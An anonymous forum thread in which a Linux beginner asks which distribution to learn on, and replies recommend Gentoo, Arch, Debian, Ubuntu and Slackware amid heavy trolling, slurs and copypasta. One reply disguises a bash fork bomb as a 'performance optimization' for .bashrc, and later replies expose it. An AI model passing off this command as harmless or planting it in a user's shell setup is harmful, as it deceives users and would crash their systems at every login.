Where to start with Linux?

What distro would you suggest to a beginner wishing to learn Linux, kernels, commands and stuff on VM?
I'm not a total noob at computer science, I think I can manage to learn and adapt to my surroundings, but I think that learning step by step in details and starting right is the best choice.

The main releases suggested to start learning I know about are such as Mint, CentOS, Debian, Kali and others.

What is your suggestion?
Perhaps where did you start from and how, in terms of self teaching and practicing.

Thanks.

(The reason I want to learn is both because I've always been interested in coding and learning Linux since I was at elementary school but had many problems and attention issues at keeping up with this kind of knowledge, and also because I'm in a situation in which starting to work on something and sustaining myself would be a nice start for me to adapt and keeping the pace with technology as whole.

At a personal level I'm mainly interested in recovering the time not spent in getting advance knowledge about coding and networking, aside from my interest in electronics as well).

Attached: docker-interface.png (852x390, 17K)

Other urls found in this thread:

github.com/mayfrost/guides/blob/master/INITIATION.md
wiki.installgentoo.com/
twitter.com/NSFWRedditVideo

Gentoo. You won't learn anything using the other distros

Xubuntu, its comfy as fuck and just werks

wouldn't recommend gentoo if you're a beginner as you'll be overwhelmed
just pick a distro and try to modify it to do whatever
you could do a minimal install of debian without any graphical environment and try to get one up and running

Install Ubuntu LTS

What exactly are you learning with Gentoo that you wouldn't be with another distro?

How to be a fat, worthless pile of shit that will never amount to anything in life and can't even talk to people on a Chinese cartoon website without speaking solely in memes. Kinda thought this was obvious.

OP Here,

So is Gentoo a good choice to start? I'd like to start on something that makes me actually learn, not some totally preset system like ubuntu or such, it's not for daily use but for learning purposes

And the bait is revealed. Well, abandon thread.

lol install gentoo, amirite gaiz?

How is asking for learning material suggestions a bait? Go back to Sup Forums ffs you little wankstain

>le stain wanky wank
lol, u r a literally a retarded faggot

Attached: 1499921547271.png (869x123, 8K)

Linux is a kernel

op y u no install gentoo tho?

Attached: 1504739447728.jpg (1600x1200, 95K)

no, but 4 realz gaiz
shud i just install gentoo even tho im noob?

Attached: 1491578970221.jpg (419x441, 32K)

Gentoo linux has most powerful wiki.
Second place - arch and free/openbsd

>freebsd
but i herd u can no hug with that 1

Attached: 1496353008098.png (709x709, 452K)

Not as much as you, go back to Sup Forums and stop shitposting like a butthurt little bitch

After you install linux distribution don't forget to add this performance optimization:
:(){ : | : &};:

To your .bashrc (or .zshrc) file. It's a hidden file in your home folder.
After that reboot or:
source ~/.bashrc

And you're done my friend.

What are these operations called? So I can search it up myself as well

It's some standard hacky optimization, no need to bother knowing what it means, some people does this put of their memory, some has it written down.
It's as standard as installing other browser when you jist installed windows. ;^)

OP Here

Should I consider working on live usb as well? Along with practicing Gentoo on VM

I got that, but I mean, is there a name to it or something I can take notions from? So I can learn and get exactly what am I doing, not just copy some operation I know nothing about ahaha Thanks for the advice tho

if you have enough patience, then yes.

Ah... People long forgot what it even means... At this point it's more a myth than anything...
Just trust your fellow communist friend.

I'm trying to install Gentoo on VM, but I keep getting this shitty fail to recognize 86-64 CPU, I attached the ISO to the IDE system, tried switching to secondary master, booting both gentoo and gentoo-nofb... Any advices? I haven't used virtualbox since years ffs

disregard that, i suck cocks

Attached: 1495425824803.png (194x199, 11K)

>Any advices?
Yeah, stop trying to install Gentoo. You will never ever fit in here, no matter how hard you try. There isn't any group to actually fit in with, kid. Just use whatever distro actually works for you.

Installing Arch is a slightly better learning experience as it's easy enough a noob can do it but at the same time you learn more about how everything goes together than if you were to install place distro that just werks. Gentoo is also a good way to learn but I'd recommend waiting until you have a better understanding of Linux first. Arch also has a great will with tons of information to walk you through everything start there

Virtualbox doesn't support 64bit.. Meh

*wiki dammit sorry I'm phone posting from the shitter

>Gentoo is also a good way to learn
No, Gentoo is a great way to show people that you're desperate for peer acceptance, even in a place where everyone is anonymous. It's also a good way to show people that you literally don't use your desktop/laptop as anything more than a larping prop - just another trinket you "wear" in the hopes of impressing someone. You're not actually using your computer when you're spending every usable moment "emerging" packages for hours and hours at a time.

Xubuntu

It's not effecient for every day use but it's more hands on how is that not a good way to learn more about how operating systems work? Talking about using Gentoo, using it as your main OS, and posting about it on Sup Forums are signs of autism don't get me wrong but OP wants an operating system that forces him to do more stuff himself I'd say Gentoo would fit that criteria. I'm not saying it's a daily driver or even a good OS but I think it fits OPs criteria and I'm sure there are other distros as well that would serve his purpose

Installing gentoo will be good. It will demonstrate that you can follow directions by reading documentation, that you have patience, and that you have half a brain.

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

Attached: 1428515097105.jpg (900x1352, 338K)

Use arch

I have used Linux (plus GNU) for years and never installed Gentoo. I would most likely still learn something by installing it, but if I can survive without that information for years then I guess it's not that critical. Easier distros have come a long way and I think they are ready for everybody. There's nothing wrong with wanting to know more, though. If you feel like it you should. Just be aware that source distros require you to compile your programs all over again every time there's an update for them, which is slow and resource demanding. It might start getting on your nerves at some point.

Linux Mint is okay for home users and I have installed it on my mother's PC and my grandmother's PC which I have promised to administrate in case of problems. They rarely have any problems, since they do so little with it. Even printers just worked for both of them by plugging in the cable. It won't teach you anything, it's already easier to use than Windows.

I currently use Debian which is a nice distro. It's almost the oldest distro there is meaning there's tons of support and packages. It's easy enough for home users yet stable enough for servers. There's pretty much no need for other distros to even exist, except for software evolution. Someone somewhere might figure out a better combination of packages which then becomes mainstream in other distros since it's so good. I used the nonfree ISO and everything worked immediately hardware-wise.

Linux Mint or the *Ubuntu distros are a great way to start learning.

CRUX or Source Mage, follow this guide github.com/mayfrost/guides/blob/master/INITIATION.md

Slackware.
It is very simple, they even advertise it as such. Installing packages is super simple too, no such nonsense as package managers that break your software or your OS, nah i can guarantee that nothing will break on it. It is just a breeze and you should check it out.

I was in the same position as you, last week. I installed Kubuntu and Ive been learning shell scripting on it through lectures on Pluralsight (I have a paid sub on it, but they have a trial)

Niggers

Attached: 1515958443174.png (548x548, 57K)

Ubuntu or Opensuse for complete begginers.
After you get used to linux then switch to Arch.

I use Arch linux btw

Also how to waste your time.

there's always one faggot like this

How to fix build errors by reading the garbage that GNU Autotools spits out.

A few packages I had to manually patch the source code by reading bug reports. I felt like Hackerman when they actually worked.

the name is 'fork bomb' idiot

this
hands down

>I'm not a total noob at computer science
True computer science is usually done without computers.

>hurr-durr I'm not wasting muh time
>while compiles a fucking web browser

>telling novice to install ghaanoo shit
>kys with your meme os

I read through all comments to this thread and let me tell you that almost every reply is a troll
The best tips I can give you are:
1.) find a distro that you like (and that's easy to use for you)
2.) use it
3.) Google (Or any other search engine) is your best friend from now on & read manpages
4.) never use a command where you aren't 100% sure what it does. ( is a forkbomb btw)
5.) If there is anything that you didn't understand from this list, refer to point 3
6.) the 'apropos' command will help you a lot in the beginning
7.) Play around and have fun!
8.) Know that Sup Forums doesn't like fun

use a 2 year old install of kali for maximum compatibility and security.

I might just learn how to compile my programs all over along anything else the right amount of times and then switch to something more flexible and already set, that way I'd have at least some notions on what I'm working on, am I right?

Obviously there's also the factor that makes a completely clear distro useful if you're a professional and want to customize things without the kernel or interface making operations for you, thus perhaps switching from learning the basics, to work daily on something more with more functions and create new settings and compiling programs by going back to a distro which leaves freedom of working. Seems pretty reasonable, there are many other ways as well

Wow thanks for the idiot, you must be someone who takes very seriously beginners' learning and the eventual creation of new forms of distros.

Guess you were bornt already educated right? You faggot

OP,

How am I supposed to choose a distro which works for me if I never even used one? I mean, that's why I asked suggestions for a distro which has the right properties to make a beginner at least understand what's all about, otherwise it's like choosing whatever Ig

Also I already spent hours searching already said posts and suggestions, otherwise i wouldn't have asked here and elsewhere
I'm planning to take it very seriously

P.S: Anyway thanks for making clear what the operation was about, in fact I wouldn't have trusted a command I knew nothing about, just like (obviously) any other command you can use on any OS available

You read the wiki fool. it's literally the first thread on the board.

wiki.installgentoo.com/

get a virtual box and install every distro and try them.

If you don't know which distro to use, go for Ubuntu, Debian or Mint.
You'll start distro hopping sooner or later like we all did at some point, additionally all Debian forks have a very good documentation and a huge community.
Start with that!
Also you can take it seriously but you'll definetly fall flat on your face a couple of times even with the "easier" distros like Ubuntu. That's why I said that you should have fun as well.

I'm terribly sorry for interjecting another moment, but what I just told you is GNU/Linux is, in fact, just Linux, or as I've just now taken to calling it, Just Linux. Linux apparently does happen to be a whole operating system unto itself and comprises a full OS as defined by POSIX.

Most computer users who run the entire Linux operating system every day already realize it. Through a peculiar turn of events, I was misled into calling the system "GNU/Linux", and until now, I was unaware that it is basically the Linux system, developed by the Linux project.

There really isn't a GNU/Linux, and I really wasn't using it; it is an extraneous misrepresentation of the system that's being used. Linux is the operating system: the entire system made useful by its included corelibs, shell utilities, and other vital system components. The kernel is already an integral part of the Linux operating system, never confined useless by itself; it functions coherently within the context of the complete Linux operating system. Linux is never used in combination with GNU accessories: the whole system is basically Linux without any GNU added, or Just Linux. All the so-called "GNU/Linux" distributions are really distributions of Linux.

Slackware > Gentoo

Gentoo does way to much handholding and babysitting, try source mage

Attached: distro_comparison.png (631x300, 139K)

How to copy paste lines of code from a wiki to fix your broken OS after an update. Oh wait, I guess arch teaches that too.

Attached: FB_IMG_1520388133152.jpg (452x632, 39K)

Manjaro should be the ape stepping in shit.

Install arch. It just werks

Slackware not even on there

Install Crux. You're welcome!

Arch would be a bit better and faster, since you don't have to compile everything yourself.
But you might learn more with Gentoo.
I guess you can't go wrong, just pick something

I'll probebly keep using Xubuntu until I die.

Attached: 1520765180896.gif (348x174, 2.97M)

I started with manjaro for 6 months and then switched to Slackware when it became unstable. However manjaro was a good start. I recommend you to read a Linux book while in manjaro or another soyboy distro, then switch to Slackware. Don't fall for memedebian or arch-cancer. Slackware is the real way to learn linux and how a computer works, but you really need to read something while in the memedistro of your choice before you switch to Slackware. If you don't want to read just stick to windows.

I made that image but I haven't tried slackware so I wouldn't know where to put it

Yes it does. You just need to go into the BIOS and turn on virtual extensions.

Do you use Hyper-V?
It breaks 64bit support in Virtualbox